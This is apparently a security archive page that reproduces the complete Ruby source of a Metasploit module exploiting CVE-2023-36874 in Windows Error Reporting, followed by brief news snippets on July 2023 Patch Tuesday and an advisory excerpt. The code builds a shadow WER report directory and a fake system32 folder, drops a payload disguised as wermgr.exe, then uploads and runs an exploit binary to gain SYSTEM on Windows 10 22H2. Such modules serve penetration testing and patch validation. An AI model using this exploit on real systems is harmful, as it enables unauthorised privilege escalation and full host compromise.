Headline
Microsoft Error Reporting Local Privilege Elevation
This Metasploit module takes advantage of a bug in the way Windows error reporting opens the report parser. If you open a report, Windows uses a relative path to locate the rendering program. By creating a specific alternate directory structure, we can coerce Windows into opening an arbitrary executable as SYSTEM. If the current user is a local admin, the system will attempt impersonation and the exploit will fail.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability', 'Description' => %q{ This module takes advantage of a bug in the way Windows error reporting opens the report parser. If you open a report, Windows uses a relative path to locate the rendering program. By creating a specific alternate directory structure, we can coerce Windows into opening an arbitrary executable as SYSTEM. If the current user is a local admin, the system will attempt impersonation and the exploit will fail. }, 'License' => MSF_LICENSE, 'Author' => [ 'Filip Dragović (Wh04m1001)', # PoC 'Octoberfest7', # PoC 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-07-11', 'References' => [ ['CVE', '2023-36874'], ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'], ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'], ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF'] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_fs_delete_file stdapi_sys_config_getenv ] } } ) ) register_options([ OptString.new('EXPLOIT_NAME', [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]), OptString.new('REPORT_DIR', [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]), OptString.new('SHADOW_DRIVE', [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]), OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3]) ]) end # When we pass the directory value to the mkdir method, the mkdir method # passes the reference to the string containing the directory. # We do a lot of string manipulation in this module, so this is a quick # hack to make sure that despite what we do with the string after we create # the directory, it is the actual directory we created that gets sent to # the cleanup methods. def clone_mkdir(dir) mkdir(dir.clone) end def upload_error_report wer_archive_dir = get_env('PROGRAMDATA') vprint_status(wer_archive_dir) wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive' report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}" report_filename = "#{report_dir}\\Report.wer" vprint_status("Creating #{report_dir}") clone_mkdir(report_dir) wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer') vprint_status("Writing Report to #{report_filename}") write_file(report_filename, wer_report_data) end def build_shadow_archive_dir(shadow_base_dir) wer_archive_dir = shadow_base_dir clone_mkdir(wer_archive_dir) wer_archive_dir << '\\ProgramData\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'Microsoft\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'Windows\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'WER\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'ReportArchive\\' clone_mkdir(wer_archive_dir) report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}" clone_mkdir(report_dir) return report_dir end def upload_shadow_report(shadow_archive_dir) report_filename = "#{shadow_archive_dir}\\Report.wer" wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer') vprint_status("Writing bad Report to #{report_filename}") write_file(report_filename, wer_report_data) end def build_shadow_system32(shadow_base_dir) shadow_win32 = "#{shadow_base_dir}\\system32" vprint_status("Creating #{shadow_win32}") clone_mkdir(shadow_win32) return shadow_win32 end def upload_payload(shadow_win32) payload_bin = generate_payload_exe payload_filename = "#{shadow_win32}\\wermgr.exe" vprint_status("Writing payload to #{payload_filename}") write_file(payload_filename, payload_bin) end def upload_execute_exploit(exploit_path, shadow_path, home_dir) vprint_status("shadow_path = #{shadow_path}") exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe') write_file(exploit_path, exploit_bin) sleep datastore['EXECUTE_DELAY'] vprint_status("Exploit uploaded to #{exploit_path}") cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}" output = cmd_exec(cmd, nil, 30) vprint_status(output) end def check # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers. version = get_version_info vprint_status("OS version: #{version}") return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2 return Exploit::CheckCode::Safe end def exploit fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group? fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system? shadow_dir = datastore['SHADOW_DRIVE'] home_dir = get_env('HOMEDRIVE') shadow_path = "#{home_dir}\\#{shadow_dir}" vprint_status("Shadow Path = #{shadow_path}") upload_error_report shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup) upload_shadow_report(shadow_archive_dir) shadow_system32 = build_shadow_system32(shadow_path.dup) upload_payload(shadow_system32) sleep datastore['EXECUTE_DELAY'] exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}" exploit_path << '.exe' unless exploit_path[-4..] == '.exe' if shadow_dir.length > 64 fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long') end upload_execute_exploit(exploit_path, shadow_dir, home_dir) print_warning("Manual deletion of #{shadow_path} may be required") endend
Related news
Hello everyone! This episode will be about Microsoft Patch Tuesday for July 2023, including vulnerabilities that were added between June and July Patch Tuesdays. Alternative video link (for Russia): https://vk.com/video-149273431_456239131 As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. Vulristics improvements I optimized the detection of the vulnerable product and the type […]
Microsoft on Tuesday released updates to address a total of 130 new security flaws spanning its software, including six zero-day flaws that it said have been actively exploited in the wild. Of the 130 vulnerabilities, nine are rated Critical and 121 are rated Important in severity. This is in addition to eight flaws the tech giant patched in its Chromium-based Edge browser towards the end of
Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: Adobe Tags: Apple Tags: Android Tags: Cisco Tags: Fortinet Tags: MOVEit Tags: Mozilla Tags: SAP Tags: VMware Tags: CVE-2023-32049 Tags: CVE-2023-35311 Tags: CVE-2023-32046 Tags: CVE-2023-36874 Tags: CVE-2023-36844 For the July 2023 Patch Tuesday, Microsoft has issued security updates for 130 vulnerabilities, four of which are known to have been actively exploited. (Read more...) The post Update now! Microsoft patches a whopping 130 vulnerabilities appeared first on Malwarebytes Labs.
Microsoft Corp. today released software updates to quash 130 security bugs in its Windows operating systems and related software, including at least five flaws that are already seeing active exploitation. Meanwhile, Apple customers have their own zero-day woes again this month: On Monday, Apple issued (and then quickly pulled) an emergency update to fix a zero-day vulnerability that is being exploited on MacOS and iOS devices.
Four of the disclosed vulnerabilities — albeit “important” ones — have been detected being exploited in the wild: CVE-2023-32046, CVE-2023-32049, CVE-2023-35311 and CVE-2023-36874.
Windows Error Reporting Service Elevation of Privilege Vulnerability
**What privileges could be gained by an attacker who successfully exploited the vulnerability?** An attacker who successfully exploited this vulnerability could gain administrator privileges.